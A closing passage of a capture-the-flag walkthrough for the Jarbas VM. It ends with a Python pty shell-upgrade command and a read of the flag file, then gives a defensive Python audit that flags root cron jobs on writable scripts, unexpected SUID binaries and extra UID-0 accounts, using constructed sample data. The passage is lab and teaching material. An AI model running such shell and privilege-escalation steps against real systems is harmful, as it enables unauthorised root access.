python -c 'import pty;pty.spawn("/bin/bash");'
cat flag.txt


So, that’s how we captured the flag in this VM. Happy Hacking.
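All three methods above, and the cron job behind the Aragog WordPress restore earlier on this page, rest on the same misconfiguration: a cron job that runs as root executes a script that other users can overwrite, and the attacker then leaves a SUID binary or an extra UID-0 account behind. As an added example (my own Python, not from either walkthrough), here is a small audit that checks for exactly those three artifacts. The crontab, file-metadata and passwd samples are constructed around the paths the walkthrough names, the hash field of the extra account is a placeholder, and the function names are this example's own.

```python
import os
import stat

# Constructed /etc/crontab excerpt built around the job the walkthrough found on Jarbas
# (a root-owned entry running /etc/script/CleaningScript.sh every five minutes).
SAMPLE_CRONTAB = """\
SHELL=/bin/bash
PATH=/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/5 * * * *     root    /etc/script/CleaningScript.sh
0 2 * * *       backup  /usr/local/bin/backup.sh
"""

# Constructed file metadata: path -> (owner uid, permission bits incl. setuid).
# CleaningScript.sh is world-writable, which is what made the privilege escalation possible.
SAMPLE_STAT = {
    "/etc/script/CleaningScript.sh": (0, 0o777),
    "/usr/local/bin/backup.sh": (1001, 0o755),
    "/usr/bin/find": (0, 0o4755),     # SUID set, as method 1 leaves it
    "/usr/bin/passwd": (0, 0o4755),   # legitimately SUID
}
# Constructed baseline of binaries expected to be SUID on this host.
SUID_BASELINE = {"/usr/bin/passwd", "/usr/bin/sudo", "/bin/su"}

# Constructed /etc/passwd excerpt with the extra UID-0 account from method 2.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
eder:x:1000:1000::/home/eder:/bin/bash
raj:HASH_PLACEHOLDER:0:0:root:/root:/bin/bash
"""


def parse_system_crontab(text):
    """Yield (user, command) from /etc/crontab-style lines; skips comments, blanks and VAR=value."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 6)   # five time fields, user, then the whole command
        if len(fields) < 7:
            continue
        yield fields[5], fields[6]


def risky_root_cron_scripts(crontab_text, stat_lookup):
    """Root cron jobs whose command is a file a non-root user could modify."""
    risky = []
    for user, command in parse_system_crontab(crontab_text):
        if user != "root":
            continue
        script = command.split()[0]
        meta = stat_lookup.get(script)
        if meta is None:               # shell builtins or paths we have no metadata for
            continue
        owner, mode = meta
        if owner != 0 or mode & (stat.S_IWGRP | stat.S_IWOTH):
            risky.append(script)
    return risky


def unexpected_suid(stat_lookup, baseline):
    """SUID files that are not on the expected list (e.g. find or cp after methods 1 and 2)."""
    return sorted(path for path, (_owner, mode) in stat_lookup.items()
                  if mode & stat.S_ISUID and path not in baseline)


def extra_uid0_accounts(passwd_text):
    """Accounts other than root whose UID is 0."""
    return [fields[0] for fields in (line.split(":") for line in passwd_text.splitlines())
            if len(fields) >= 3 and fields[2] == "0" and fields[0] != "root"]


def stat_from_disk(paths):
    """Real (uid, mode) metadata for the given paths, for running the checks on a live host."""
    out = {}
    for path in paths:
        try:
            st = os.stat(path)
        except OSError:
            continue                   # missing file: nothing to audit
        out[path] = (st.st_uid, stat.S_IMODE(st.st_mode))
    return out


if __name__ == "__main__":
    print("root cron jobs on writable scripts:", risky_root_cron_scripts(SAMPLE_CRONTAB, SAMPLE_STAT))
    print("SUID binaries outside baseline:", unexpected_suid(SAMPLE_STAT, SUID_BASELINE))
    print("extra UID-0 accounts:", extra_uid0_accounts(SAMPLE_PASSWD))
```

On a real host, feed `open("/etc/crontab").read()` and `stat_from_disk(...)` over the script paths the crontab references into the same functions; the baseline for `unexpected_suid` should be recorded from a known-good build, since a list typed from memory is exactly what an attacker's `chmod u+s` is betting against.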